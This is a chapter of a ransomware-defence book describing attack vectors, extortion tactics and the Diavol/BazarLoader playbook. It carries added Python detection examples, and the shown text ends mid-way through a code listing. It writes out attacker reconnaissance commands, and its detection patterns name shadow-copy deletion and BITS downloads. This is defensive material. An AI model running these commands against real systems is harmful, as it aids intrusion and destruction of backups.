Windows Ransomware Detection and Protection: Securing Windows endpoints, the cloud, and infrastructure using Microsoft Intune, Sentinel, and Defender

Marius Sandbu

Paperback, March 2023, 290 pages, 1st Edition
Ransomware Attack Vectors and the Threat Landscape

In this chapter, we will start with an introduction to what ransomware is, how attacks are carried out, an overview of the main attack vectors attackers use, and how ransomware groups operate. Then, we will go into a bit more depth on some of the most well-known ransomware groups, such as Conti, LockBit, and Sodinokibi, and how they have historically performed their attacks.

Ransomware takes many forms, and in the last 5 years those forms have become considerably more complex, which in turn demands a more capable responder. Therefore, in this chapter, we will build an understanding of the different attack tactics and how attacks are carried out. The upcoming chapters build on this when we go through the countermeasures that protect against these types of attacks.

In this chapter, we’re going to cover the following main topics:

  • Ransomware and attack vectors
  • Attack and extortion tactics
  • Overview of some ransomware operators
  • How identity-based attacks are carried out
  • How vulnerabilities are exploited to launch attacks
  • How to monitor for vulnerabilities

Understanding these topics can help us respond better and be better prepared. These are all vital pieces of knowledge and skills to have in our tool belt.

Evolution of ransomware

Ransomware is a type of malware that has historically been designed to encrypt data and make systems that rely on it unusable. Malicious actors then demand ransom in exchange for decrypting the data.

In 2021, we saw a huge rise in the number of ransomware attacks, where many companies had their IT infrastructure and data encrypted and many also had their data stolen by different ransomware groups. In Norway, where I am based, we have also seen many large organizations hit by ransomware in the last year, which has ended up affecting the Norwegian population as well. Here are some of the organizations that were hit by a ransomware attack in Norway in 2021:

  • Nordic Choice Hotels: This is one of the largest hotel chains in Scandinavia. When they got attacked, they needed to switch to manually checking people into their rooms.
  • Amedia: This is the second-largest news publisher in Norway and publishes more than 90 newspapers. When they got attacked, it halted all newspaper production for over a week.
  • Nortura: This is one of the largest food producers in Norway, so when they got hit by ransomware, it meant that farmers were not able to deliver animals to get processed.

In addition, there have been many high-profile attacks in other countries, such as the attack on Colonial Pipeline in the US and on MSP software provider Kaseya, which ended up impacting close to 1,500 customers worldwide.

After the attack on Colonial Pipeline, the US government moved toward mandatory incident reporting: the Cyber Incident Reporting for Critical Infrastructure Act of 2022 requires organizations in covered critical infrastructure sectors to report significant cyber incidents and ransom payments to CISA, and any US organization that has fallen victim to a ransomware attack is encouraged to report it to the FBI, CISA, or the US Secret Service.

In the last few years, we have also seen ransomware attacks against healthcare almost double, according to Sophos (https://news.sophos.com/en-us/2022/06/01/the-state-of-ransomware-in-healthcare-2022/). Not all of these attacks are deliberate, however, since some ransomware groups claim to avoid healthcare targets. In 2022, we saw several cases where ransomware groups provided the decryption key for free to organizations whose systems affect patient treatment, such as hospitals.

The attack on Kaseya, carried out through their Virtual System Administrator (VSA) product, ended up affecting the Swedish supermarket chain Coop, which had to close around 500 stores when the point-of-sale systems run by its service provider, a Kaseya VSA customer, became unavailable.

In a survey that Sophos did, where they spoke with 5,400 IT decision-makers in 2021, about 37% had been hit by ransomware in the last year, which is, fortunately, a significant reduction from the year before when that number was 51%.

There have, however, also been significant changes in attacker behavior. The reduction in the share of organizations hit is most likely related to fewer automated, opportunistic attacks and more hands-on, targeted ones. Emsisoft, the security software company behind the ID Ransomware service (https://id-ransomware.malwarehunterteam.com/), lets you identify which ransomware strain has encrypted your files by uploading the ransom note or an encrypted file. Emsisoft reported that, in 2021, there were close to 560,000 submissions to the service, 50,000 more than the year before, and estimated that only 25% of victims submit to the site at all, so the true number of incidents is considerably higher.

We have also seen attackers time their operations more deliberately. For instance, attacks increase around holidays such as Christmas, when staffing is thin and people are often more stressed and more likely to fall for a phishing email.

So many organizations worldwide have faced ransomware attacks, and looking at the statistics, the number of large organizations that have been impacted only seems to be rising. But has ransomware evolved over the last few years?

Ransomware is mostly used by attackers to exploit the weakest points in your infrastructure and then encrypt your data, typically with a key that only the attackers can recover. Once the encryption is done, they leave a ransom note and wait. The only way to get the original data back (or be able to decrypt it) is to buy a decryption tool from the attackers, paid for in cryptocurrency. There are also other extortion methods, which I will return to a bit later.

Within the ransom note, you get instructions on how to contact them or reach their support channels, which are typically hidden behind Tor addresses. When you access the support channel, some operators explain what happened and how much you need to pay to get the decryption tool:

Figure 1.1 – Ransomware operator chat support

A ransomware attack often involves multiple teams or people. Many ransomware groups are split into a core group and affiliates. Affiliates often work together to gain access to an environment, or the access might come from an insider, and they sell or hand that access to the team that deploys the ransomware. The ransom is usually split between the affiliate and the core group, while whoever sold the initial access is typically paid a one-time fee.

Affiliates operate independently or as members of organized groups, and some of the most well-known ransomware groups run active recruitment programs to attract affiliates.

Ransomware attackers are focused only on getting access, encrypting data, and waiting for the organization to make contact. In most cases, the operators also have some insight into your organization, such as the number of employees and revenue, which affects the ransom demand.

Most ransomware operators host self-service portals with built-in chat support, accessible only on the Tor network, that provide details on how to pay for the decryption tool. The most well-known groups tend to use Monero as their cryptocurrency of choice, since many see it as untraceable, although we have seen other cryptocurrencies used as well. There is also recent evidence that threat actors do business with one another, for instance by using money laundering services to make the proceeds harder to trace.

While most security professionals agree that you should never pay the ransom, many have paid the ransom in pure desperation to gain access to their files and get their services back up and running. Consider the alternative – your entire infrastructure, backup, and other services are gone, and rebuilding your services would take too much time and your company could even go bankrupt.

We have also seen that many organizations have been relying more on cyber insurance to cover costs related to ransomware. Ransomware was involved in 75% of all cyber insurance claims during the first half of 2021; this has also led to a significant increase in the cost of premiums.

Important note

It should be noted that in a survey Sophos did in 2021, organizations that paid the ransom recovered, on average, only about 65% of their data (https://news.sophos.com/en-us/2021/04/27/the-state-of-ransomware-2021/).

In some cases, when you are negotiating the price with the attackers, the operators give you a free sample to prove that they hold the decryption key and can decrypt the data. In most cases, this covers a single file or a single virtual machine. The attackers usually also have a good map of the environment and know which machines run important services, such as backup, so you will most likely only be allowed to decrypt an unimportant virtual machine, such as a test server.

When you pay the ransom, you will either pay to get the decryption key for every single machine or get a decryption key and tool that is used for the entire environment. Once you get access to the decryption tool, it can take many hours to decrypt a single machine. If you need to decrypt an entire environment, you can expect it to take a long time.

Over the last few years, there has been a lot of focus on getting good backup and data protection services in place, and those organizations that have good backup systems and routines in place can easily restore data and be up and running again.

However, it should be noted that in many ransomware cases, we have also seen that the backup data was encrypted by the attackers. Fortunately, we are seeing more and more backup vendors adding new features, such as immutable backups, so that ransomware is less likely to impact the data.

This, of course, lowers the attackers' chance of getting paid, so they have switched tactics to not only encrypt data but also exfiltrate it and use the stolen data as leverage.

This was, unfortunately, the case for the Finnish psychotherapy center Vastaamo, which was extorted in late 2020 after attackers had stolen the records of around 40,000 patients. The attackers also used another extortion tactic: they contacted the patients directly via email, demanded a ransom from each of them, and threatened to publish their records if they did not pay.

It should be noted that the electronic patient record system that was compromised was running Ubuntu 16.04.1 with Apache 2.4.18 (released in 2015) and PHP 5.6.40, versions that were all out of date and contained many known vulnerabilities.

While most ransomware attacks aim at data encryption and data exfiltration, another extortion vector is becoming more and more popular: Distributed Denial of Service (DDoS). Ransom DDoS attacks are aimed more at online retailers and cloud-based applications that lose money for every minute they are offline. Microsoft, in their yearly DDoS attack trends report, stated that they see close to 2,000 DDoS attacks daily, and that in 2021 they mitigated one of the largest DDoS attacks ever reported, with a throughput of 3.47 Tbps and a packet rate of 340 million packets per second, against an Azure customer in Asia.

The attack only lasted 15 minutes but that is more throughput than most ISPs and local data centers can handle.

Important note

More vendors are seeing an increase in the amount of DDoS attacks, and buying a DDoS attack from a botnet that lasts 1 hour only costs about $50 on the dark web. You can find more information about DDoS attack statistics in the yearly Microsoft DDoS protection report at https://azure.microsoft.com/en-us/blog/azure-ddos-protection-2021-q3-and-q4-ddos-attack-trends/ and also from Cloudflare Radar at https://radar.cloudflare.com/notebooks/ddos-2021-q4.

Cloudflare also stated in their yearly DDoS trends report that in Q4 2021, they saw a 29% increase in ransom DDoS attacks compared to the same quarter the year before. They also surveyed customers that were targeted by DDoS attacks, and one in four respondents reported receiving a ransom note from the attacker.

While many DDoS attacks aim to overload the infrastructure with a large amount of traffic from multiple sources (mostly botnets), there has also been an increase in DDoS amplification attacks, where the attackers abuse a weakness in a protocol. The attacker sends small requests with a forged source address, that of the victim, to a third-party server, which answers with much larger responses sent to the victim, so the server does the heavy lifting for the attacker. We have seen such examples with the DTLS protocol.

In 2020, Citrix ADC had a weak implementation of DTLS in earlier firmware that made it usable as such an amplifier. The attackers sent forged DTLS packets to the ADC, which replied with large packets to whatever source address the attacker had spoofed. This flooded the spoofed target and could also exhaust the outbound bandwidth of the ADC itself, so essentially a DDoS at both ends.

Attack vectors

So far, we have taken a closer look at some of the attacks and tactics that different ransomware operators are using. Now, let’s take a closer look at some of the main attack vectors that most ransomware operators use to gain initial access.

An attack vector is best described as one of the paths that an attacker can use to try and gain access to an environment.

For ransomware attackers to be able to distribute the payload, they must go through several stages before launching the attack. The typical pattern is that the attackers first gain initial access using one of the attack vectors, which may be a compromised end user machine or an exposed piece of infrastructure. Then, they move laterally through the network using credentials that give them access to other systems, or by exploiting a vulnerability. They also deploy tooling or scripts that give them persistent access to the environment. Once they have full control, including over domain controllers and backup systems, they use scripts or other distribution methods to run the encryption payload across the infrastructure:

Figure 1.2 – The typical attack pattern in a ransomware attack

So, how do they get their foot in the door of our infrastructure?

The following are some of the main methods.

Exploiting known vulnerabilities

This is where attackers utilize a vulnerability in an externally exposed service, typically to achieve Remote Code Execution (RCE). In the last few years, we have seen many vulnerabilities used to launch ransomware attacks. Some of the products whose vulnerabilities have been exploited in this way are as follows:

  • Citrix ADC
  • Microsoft Exchange
  • Fortinet
  • Pulse VPN
  • SonicWall

Important note

A good source for seeing some of the known traffic patterns that I’ve been using for years is Bad Packets on Twitter, which has a good feed that looks at current traffic that is trying to abuse vulnerable endpoints across different services. I recommend that you add that as a source to pay attention to: https://twitter.com/bad_packets. In addition, the Cybersecurity and Infrastructure Security Agency (CISA) has made a list of known exploited vulnerabilities that can be found here: https://www.cisa.gov/known-exploited-vulnerabilities-catalog.

One of the biggest vulnerabilities disclosed in 2021 was ProxyShell, a chain of three vulnerabilities in Microsoft Exchange (CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207). Many security researchers were quick to publish proof-of-concept exploits as simple Python/PowerShell scripts, as seen here: https://github.com/horizon3ai/proxyshell.

This chain of vulnerabilities could allow attackers to access mailboxes stored in Exchange and also provide web shell access to the Exchange Client Access servers.

Vulnerabilities are not only used for initial access but also for lateral movement and privilege escalation. In the summer of 2021, a vulnerability in the Windows Print Spooler service (PrintNightmare, CVE-2021-34527) was disclosed, where the service failed to properly restrict who could install printer drivers, allowing authenticated users to load an arbitrary DLL into the spooler process.

This meant that attackers could run arbitrary code with SYSTEM privileges, both locally and remotely, against any machine running the Print Spooler service. Attackers that had compromised an end user machine with a regular domain user account could use this vulnerability to gain further access to the infrastructure, including domain controllers that were still running the Print Spooler service.
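To turn the CISA KEV catalog mentioned in the note above into something actionable, the following is an added Python example (not code from the book or from CISA) that matches a small asset inventory against an excerpt shaped like the KEV JSON feed and orders the findings by ransomware linkage and CISA due date. The feed excerpt and inventory are constructed for illustration; the CVE IDs are the real identifiers for ProxyShell, PrintNightmare and the Citrix and Pulse Secure vulnerabilities named in this section, but every other field should be taken from the live feed.

```python
"""Cross-check an asset inventory against the CISA Known Exploited Vulnerabilities (KEV) feed.

Added example for this chapter, not code from the book. KEV_EXCERPT is CONSTRUCTED in the
shape of the real feed (https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json):
the CVE IDs are the real identifiers of vulnerabilities named in the text, but the dates,
product strings and knownRansomwareCampaignUse flags shown here are illustrative and must be
read from the live feed in practice. INVENTORY is a made-up asset list.
"""
import json
from collections import defaultdict

KEV_EXCERPT = json.dumps({"vulnerabilities": [
    {"cveID": "CVE-2021-34473", "vendorProject": "Microsoft", "product": "Exchange Server",
     "vulnerabilityName": "ProxyShell pre-auth path confusion",
     "dateAdded": "2021-11-03", "dueDate": "2021-11-17", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2021-34523", "vendorProject": "Microsoft", "product": "Exchange Server",
     "vulnerabilityName": "ProxyShell PowerShell backend elevation",
     "dateAdded": "2021-11-03", "dueDate": "2021-11-17", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2021-34527", "vendorProject": "Microsoft", "product": "Windows Print Spooler",
     "vulnerabilityName": "PrintNightmare",
     "dateAdded": "2021-11-03", "dueDate": "2022-07-20", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2019-11510", "vendorProject": "Pulse Secure", "product": "Pulse Connect Secure",
     "vulnerabilityName": "Pulse Connect Secure arbitrary file read",
     "dateAdded": "2021-11-03", "dueDate": "2021-11-17", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-2019-19781", "vendorProject": "Citrix", "product": "ADC and Gateway",
     "vulnerabilityName": "Citrix ADC directory traversal",
     "dateAdded": "2021-11-03", "dueDate": "2021-11-17", "knownRansomwareCampaignUse": "Known"},
]})

INVENTORY = [  # constructed: one row per externally relevant asset
    {"host": "EXCH01", "vendor": "Microsoft", "product": "Exchange Server"},
    {"host": "PRINT01", "vendor": "microsoft", "product": "windows print spooler"},
    {"host": "VPN01", "vendor": "Pulse Secure", "product": "Pulse Connect Secure"},
    {"host": "FILE01", "vendor": "Microsoft", "product": "Windows Server 2019"},
]


def load_kev(feed_text):
    """Parse the KEV JSON document and return its list of vulnerability records."""
    return json.loads(feed_text)["vulnerabilities"]


def _key(vendor, product):
    # Case- and whitespace-insensitive join so inventory spelling need not match CISA's exactly.
    return (" ".join(vendor.lower().split()), " ".join(product.lower().split()))


def match_inventory(kev, inventory):
    """Return one finding per (host, CVE).

    Findings with a recorded ransomware campaign link sort first, then by CISA due date,
    which is the order a defender should patch in.
    """
    index = defaultdict(list)
    for vuln in kev:
        index[_key(vuln["vendorProject"], vuln["product"])].append(vuln)
    findings = []
    for asset in inventory:
        for vuln in index.get(_key(asset["vendor"], asset["product"]), []):
            findings.append({
                "host": asset["host"],
                "cve": vuln["cveID"],
                "name": vuln["vulnerabilityName"],
                "ransomware": vuln.get("knownRansomwareCampaignUse") == "Known",
                "due": vuln["dueDate"],
            })
    findings.sort(key=lambda f: (not f["ransomware"], f["due"], f["cve"]))
    return findings


def hosts_without_kev_match(kev, inventory):
    """Hosts whose vendor/product pair has no KEV entry (not 'safe', just not in this list)."""
    hit = {f["host"] for f in match_inventory(kev, inventory)}
    return sorted(a["host"] for a in inventory if a["host"] not in hit)


if __name__ == "__main__":
    kev = load_kev(KEV_EXCERPT)
    for f in match_inventory(kev, INVENTORY):
        flag = "RANSOMWARE" if f["ransomware"] else "exploited"
        print(f"{f['host']:8} {f['cve']:16} due {f['due']} [{flag}] {f['name']}")
    print("no KEV match:", hosts_without_kev_match(kev, INVENTORY))
```

KEV is a floor, not a ceiling: a host with no match is simply running products CISA has not listed, so the check complements, rather than replaces, a vulnerability scanner. The value of the ordering is that the small set of KEV entries linked to ransomware campaigns is exactly the set the groups described in this chapter are using for initial access.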

Access through credential stuffing

Credential stuffing is where attackers automate the process of trying stolen username and password pairs against different online services. Most end users are creatures of habit and tend to reuse their usernames and passwords across many third-party services or websites. When those third-party services get breached, the end user's information, or worse, their credentials, gets compromised. Attackers then dive into the data from those breaches to see whether they can find reusable credentials that work against any external services an organization might have.

One good way of seeing whether you have leaked credentials is by using the online service https://haveibeenpwned.com, where you can enter your email address and it will check through the different data sources to see whether your information has been leaked and what kind of data sources it was contained in.

haveibeenpwned.com also has a free domain notification service, which means that you can get notified if one of your users within a domain was in a data breach, which I also highly recommend that you sign up for.

Other services can provide similar features to detect whether a username or password has been compromised, such as the following:

  • F-Secure ID PROTECTION
  • Google Password Manager
  • Microsoft Edge Password Monitor

In addition to this, many attackers are also carrying out phishing attacks with the aim of harvesting credentials, such as sending end users to a fake Office 365 site to collect usernames and passwords.

A newer attack method that is becoming more and more common is OAuth consent phishing against Azure Active Directory (AD). Here, the attacker registers their own application and sends the user a link to the legitimate Microsoft 365 sign-in flow for that application, so no fake login page is needed. After signing in, the end user is greeted with a Permissions requested dialog:

Figure 1.3 – OAuth permission screen for a phishing attack

If the user clicks on Accept, the attacker's application receives tokens for the granted permissions, which might include access to the user's emails and files, depending on which permissions were requested. Because the access is tied to the consent grant rather than to the user's password, MFA does not prevent it and a password reset does not revoke it; the grant itself must be removed.
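One place to look for the aftermath of a consent-phishing attack is the tenant's list of delegated permission grants. The following added Python example (not code from the book or from Microsoft) scores grants shaped like Microsoft Graph oauth2PermissionGrant objects for the indicators described above: an unsanctioned application, user rather than admin consent, mailbox or file scopes, and offline_access. The grants, GUIDs and sanctioned-app list are constructed; the Graph field names are real.

```python
"""Flag delegated OAuth consent grants that look like consent phishing.

Added example for this chapter, not code from the book. GRANTS is CONSTRUCTED in the shape
of Microsoft Graph oauth2PermissionGrant objects (as returned by
GET https://graph.microsoft.com/v1.0/oauth2PermissionGrants): the field names are Graph's,
the GUIDs and resource IDs are made up. KNOWN_APPS stands in for the organisation's list of
reviewed application client IDs, which would normally come from a CMDB or the tenant's own
app registrations.
"""

# Delegated Graph scopes that hand an attacker the mailbox and file access described above.
HIGH_RISK_SCOPES = {
    "Mail.Read", "Mail.ReadWrite", "Mail.Send", "MailboxSettings.ReadWrite",
    "Files.Read.All", "Files.ReadWrite.All", "Sites.Read.All", "Contacts.Read",
}
# offline_access yields a refresh token: access persists after the browser is closed and
# survives password resets until the grant is revoked.
PERSISTENCE_SCOPE = "offline_access"

KNOWN_APPS = {"11111111-1111-1111-1111-111111111111"}  # constructed: sanctioned client IDs

GRANTS = [  # constructed
    {"id": "g1", "clientId": "11111111-1111-1111-1111-111111111111", "consentType": "AllPrincipals",
     "principalId": None, "resourceId": "graph-sp-object-id", "scope": "User.Read openid profile"},
    {"id": "g2", "clientId": "22222222-2222-2222-2222-222222222222", "consentType": "Principal",
     "principalId": "aaaaaaaa-0000-0000-0000-000000000001", "resourceId": "graph-sp-object-id",
     "scope": "User.Read Mail.Read Files.ReadWrite.All offline_access"},
    {"id": "g3", "clientId": "11111111-1111-1111-1111-111111111111", "consentType": "Principal",
     "principalId": "aaaaaaaa-0000-0000-0000-000000000002", "resourceId": "graph-sp-object-id",
     "scope": "User.Read offline_access"},
]


def assess_grant(grant, known_apps):
    """Score one grant; higher means more consent-phishing indicators."""
    scopes = set(grant["scope"].split())
    risky = sorted(scopes & HIGH_RISK_SCOPES)
    score, reasons = 0, []
    if grant["clientId"] not in known_apps:
        score += 2
        reasons.append("client is not a sanctioned application")
    if grant["consentType"] == "Principal":
        # 'Principal' = a single user consented for themselves; 'AllPrincipals' = admin consent.
        score += 1
        reasons.append("user consent rather than admin consent")
    if risky:
        score += 2
        reasons.append("high-risk delegated scopes: " + ", ".join(risky))
    if PERSISTENCE_SCOPE in scopes:
        score += 1
        reasons.append("offline_access grants long-lived refresh tokens")
    return {"grantId": grant["id"], "clientId": grant["clientId"],
            "principalId": grant.get("principalId"), "score": score, "reasons": reasons}


def find_suspicious(grants, known_apps, threshold=4):
    """Return grants scoring at or above the threshold, worst first."""
    scored = (assess_grant(g, known_apps) for g in grants)
    return sorted((a for a in scored if a["score"] >= threshold), key=lambda a: -a["score"])


if __name__ == "__main__":
    for a in find_suspicious(GRANTS, KNOWN_APPS):
        print(f"grant {a['grantId']} app {a['clientId']} score {a['score']}")
        for r in a["reasons"]:
            print("   -", r)
```

In a real tenant, the same objects come from the oauth2PermissionGrants endpoint, and deleting a suspicious grant (together with the attacker's service principal) is what actually cuts off access, since neither a password reset nor MFA invalidates an existing consent. Restricting user consent in Azure AD (Enterprise applications, Consent and permissions, User consent settings) stops the grant from being created in the first place.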

Access through brute-force attacks

One of the most common attack vectors we see is brute-force attacks on misconfigured services, such as a Windows server that is publicly exposed with Remote Desktop Protocol (RDP) enabled. This applies to any exposed service with weak security mechanisms, such as a lack of MFA, which RDP does not support by default, making it susceptible to password guessing.

For one customer I was working with, the initial point of compromise was an exposed Windows Server in Azure that had a public IP address and RDP enabled. Since the machine was also domain-joined and had a weak local administrator password, it did not take the attackers long to guess the correct username and password combination and gain access to the environment.

We have also seen that, in cloud-based environments, attackers often have a predefined set of credentials that they use when brute-forcing known cloud IP ranges. Against Azure environments, they typically combine usernames such as AZADMIN, AZUREADMIN, and AZURE with common password lists. Such automated attacks typically start within minutes of a machine coming online in Azure with a public IP address.
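The pattern described in the last three paragraphs, many failed logons from one address trying a list of usernames followed by a success, is visible in the Windows Security log as Event ID 4625 followed by 4624. The following added Python example (not code from the book) runs that detection over a handful of constructed events, counts failures per source address in a sliding window, flags the Azure default usernames the text mentions, and escalates when a success follows. IP addresses are from documentation ranges; nothing here comes from a real tenant.

```python
"""Detect RDP password guessing in Windows Security log events (4625 failures, then a 4624).

Added example for this chapter, not code from the book. EVENTS is CONSTRUCTED: a few records
in the shape of Security log fields (EventID, TimeCreated, TargetUserName, IpAddress,
LogonType). Logon type 10 is RemoteInteractive (RDP); when Network Level Authentication is
on, failed RDP logons are typically recorded as type 3 (Network), so both are counted.
203.0.113.0/24 and 198.51.100.0/24 are documentation ranges.
"""
from collections import defaultdict
from datetime import datetime

RDP_LOGON_TYPES = {3, 10}
# Usernames the text reports being sprayed at newly built Azure VMs.
CLOUD_DEFAULT_USERS = {"AZADMIN", "AZUREADMIN", "AZURE"}

EVENTS = [  # constructed
    {"ts": "2023-01-15T02:14:05", "event_id": 4625, "user": "AZADMIN", "src_ip": "203.0.113.10", "logon_type": 3},
    {"ts": "2023-01-15T02:14:07", "event_id": 4625, "user": "AZUREADMIN", "src_ip": "203.0.113.10", "logon_type": 3},
    {"ts": "2023-01-15T02:14:09", "event_id": 4625, "user": "AZURE", "src_ip": "203.0.113.10", "logon_type": 3},
    {"ts": "2023-01-15T02:14:12", "event_id": 4625, "user": "Administrator", "src_ip": "203.0.113.10", "logon_type": 3},
    {"ts": "2023-01-15T02:14:15", "event_id": 4625, "user": "admin", "src_ip": "203.0.113.10", "logon_type": 3},
    {"ts": "2023-01-15T02:14:18", "event_id": 4625, "user": "localadmin", "src_ip": "203.0.113.10", "logon_type": 3},
    {"ts": "2023-01-15T02:14:21", "event_id": 4624, "user": "localadmin", "src_ip": "203.0.113.10", "logon_type": 10},
    # A user mistyping their password twice is not an attack.
    {"ts": "2023-01-15T03:00:00", "event_id": 4625, "user": "jsmith", "src_ip": "198.51.100.7", "logon_type": 3},
    {"ts": "2023-01-15T03:00:40", "event_id": 4625, "user": "jsmith", "src_ip": "198.51.100.7", "logon_type": 3},
    {"ts": "2023-01-15T03:00:55", "event_id": 4624, "user": "jsmith", "src_ip": "198.51.100.7", "logon_type": 10},
]


def _t(event):
    return datetime.fromisoformat(event["ts"])


def detect_bruteforce(events, threshold=5, window_s=300):
    """Alert when one source IP produces `threshold` RDP logon failures within `window_s` seconds.

    A 4624 from the same source after the burst starts upgrades the alert to critical: the
    guessing worked and the attacker is now inside.
    """
    by_ip = defaultdict(list)
    for e in sorted(events, key=_t):
        if e["logon_type"] in RDP_LOGON_TYPES and e["src_ip"] not in ("-", "::1", "127.0.0.1"):
            by_ip[e["src_ip"]].append(e)

    alerts = []
    for ip, evs in by_ip.items():
        fails = [e for e in evs if e["event_id"] == 4625]
        start = 0
        for end in range(len(fails)):
            # Slide the window start forward until it spans at most window_s seconds.
            while (_t(fails[end]) - _t(fails[start])).total_seconds() > window_s:
                start += 1
            if end - start + 1 < threshold:
                continue
            burst = fails[start:end + 1]
            users = sorted({e["user"] for e in burst})
            success = next((e for e in evs if e["event_id"] == 4624 and _t(e) > _t(burst[0])), None)
            alerts.append({
                "src_ip": ip,
                "first_failure": burst[0]["ts"],
                "failures_in_window": len(burst),
                "total_failures": len(fails),
                "users_tried": users,
                "cloud_default_names": sorted({u.upper() for u in users} & CLOUD_DEFAULT_USERS),
                "success_user": success["user"] if success else None,
                "severity": "critical" if success else "high",
            })
            break  # one alert per source; later failures belong to the same campaign
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(EVENTS):
        print(a)
```

Failed network logons against a domain-joined host also surface on the domain controller as Event ID 4776 (NTLM credential validation) or 4771 (Kerberos pre-authentication failure), so the same logic can be pointed at DC logs to catch spraying that never touches RDP. The cure for the case in the text is simpler than detection: no public IP with TCP 3389 open, and Azure Bastion or just-in-time VM access in its place.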

Access through a compromised workstation or end user machine

One of the most common entry points for ransomware attacks is a compromised end user machine. This usually starts when the user opens an attachment they received or visits a website and, from there, runs some form of executable.

This mostly happens because an end user receives a malicious attachment in a phishing email, or through a drive-by download. The malicious content can be a Word document containing scripts or other malicious content, or an Excel document with macros.

These phishing emails are usually delivered in short campaigns. Over 60 days, Akamai observed more than 2,000 million unique domains associated with malicious activity. Of those, close to 90% had a lifespan of less than 24 hours, and 94% had a lifespan of less than 2 days, which makes them extremely difficult to block using DNS protection services. Palo Alto Networks similarly reports that the majority (close to 70%) of Newly Registered Domains (NRDs), of which it observes an average of around 140,000, are associated with malicious or suspicious traffic.

The phishing emails and attachments use malicious scripts or macros, sometimes combined with a vulnerability, to gain a foothold on the machine. In most cases, this requires the end user to open the attachment and enable content or trigger the macros. However, in August 2021, Microsoft identified a small number of attacks using an RCE vulnerability in MSHTML (CVE-2021-40444), the HTML rendering engine built into Windows that Office uses to render embedded web content.

This specific vulnerability only required that the user open the document; no macros or other active content had to be enabled for the payload to run.

Another example that I saw during COVID, with people working from home, was that many employees would connect their work machines directly to their home router and, in doing so, get a public IP address on the machine from the ISP. This meant they became susceptible to brute-force attacks if, for instance, RDP was enabled on the client machine. Make sure that RDP and SMB are not enabled on clients, and that host firewall rules block inbound connections to these services unless they are specifically needed.

How does ransomware work?

The worst thing possible has happened – someone has managed to compromise your infrastructure and encrypted your data. How did it happen and how did they get in?

Let’s explore some of the mechanics behind some of the different ransomware types.

Diavol ransomware

Diavol was a ransomware family presumably used by the group known as Wizard Spider and was first discovered by FortiGuard Labs in June 2021. It relied on BazarLoader, a well-known malware loader, to steal information and deliver further payloads.

The initial payload was delivered to an endpoint via a phishing email containing a link to a OneDrive URL. OneDrive is used because links to well-known cloud services typically pass through most firewalls and spam filters.

BazarLoader tends to use commonly known cloud services to bypass security filters. The user is instructed to download a ZIP file containing an ISO image, a packaging trick that at the time kept the contents from carrying the Mark of the Web and so sidestepped the usual download protections. When the user mounts the ISO, it exposes an LNK shortcut and a DLL file. Once the user double-clicks the LNK, it loads the DLL (typically via rundll32) and the BazarLoader infection begins.

As is typical for BazarLoader, it starts with internal reconnaissance of the Windows environment using built-in commands such as the following:

  • net group "Domain Computers" /domain
  • nltest /domain_trusts /all_trusts
  • net localgroup administrators

After performing reconnaissance, BazarLoader downloads a set of DLL files using Background Intelligent Transfer Service (BITS), which contains Cobalt Strike, and begins to communicate with the operator’s Cobalt Strike server. Then, from the compromised machine, they usually run the second stage of scripts, using tools such as AdFind, and then dump local credentials using a BAT script.

The attackers also tend to use tools such as Rubeus to perform Kerberoasting, which requests Ticket Granting Service (TGS) tickets for accounts with service principal names in the domain so that the tickets, which are encrypted with the account's password hash, can be cracked offline.

Once they manage to get access to file servers, they use tools such as AnyDesk and FileZilla to exfiltrate the data from the environment. Then, they move to more critical systems, such as backup servers and domain controllers.

Once they’ve performed data exfiltration and have access to the core parts of the infrastructure, including backup systems, they trigger the initial payload.

The final payload is usually deployed via RDP, with scripts that trigger the encryption process. To maximize the effect, the ransomware terminates processes that can hold locks on files, such as Office applications and database services, and stops services that do the same, targeting processes such as httpd.exe, sqlserver.exe, chrome.exe, and others.

They also use scripts to find all drives attached to the host machines. In addition, they stop the Volume Shadow Copy Service (VSS) and ensure that VSS snapshots are deleted before they run the encryption process.
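The discovery commands listed above, the BITS download and the shadow-copy deletion before encryption are all plain command lines, so they show up in process-creation telemetry (Sysmon Event ID 1, or Security Event ID 4688 once command-line auditing is enabled). The following added Python example (not code from the book or from any vendor) classifies constructed process events against those patterns and raises a medium alert for a burst of discovery on one host and a critical alert for shadow-copy deletion. Hosts, users and the download address are made up.

```python
"""Spot the hands-on-keyboard stages above in process-creation telemetry.

Added example for this chapter, not code from the book. EVENTS is CONSTRUCTED in the shape of
Sysmon Event ID 1 / Security 4688 fields (host, user, time, command line); hostnames, user
names and the download address (198.51.100.20, a documentation range) are made up. The
patterns cover the discovery commands, the BITS download and the shadow-copy deletion that
the text attributes to the Diavol/BazarLoader playbook.
"""
import re
from collections import defaultdict
from datetime import datetime

# (stage, description, regex). Patterns tolerate net1.exe, .exe suffixes, extra spaces and quotes.
PATTERNS = [
    ("discovery", "domain group enumeration",
     re.compile(r'\bnet1?(?:\.exe)?\s+group\s+"?domain (?:computers|admins|controllers)"?\s+/domain', re.I)),
    ("discovery", "domain trust enumeration", re.compile(r"\bnltest(?:\.exe)?\s+/domain_trusts", re.I)),
    ("discovery", "local administrators enumeration",
     re.compile(r'\bnet1?(?:\.exe)?\s+localgroup\s+"?administrators"?', re.I)),
    ("discovery", "AdFind Active Directory query", re.compile(r"\badfind(?:\.exe)?\b", re.I)),
    ("download", "BITS file transfer", re.compile(r"\bbitsadmin(?:\.exe)?\s+/transfer\b", re.I)),
    ("impact", "shadow copy deletion via vssadmin", re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows", re.I)),
    ("impact", "shadow copy deletion via wmic", re.compile(r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete", re.I)),
]

EVENTS = [  # constructed
    {"ts": "2023-01-15T10:02:00", "host": "WS01", "user": "CORP\\jdoe", "cmdline": 'net  group "Domain Computers" /domain'},
    {"ts": "2023-01-15T10:02:20", "host": "WS01", "user": "CORP\\jdoe", "cmdline": "nltest /domain_trusts /all_trusts"},
    {"ts": "2023-01-15T10:02:45", "host": "WS01", "user": "CORP\\jdoe", "cmdline": "net1 localgroup administrators"},
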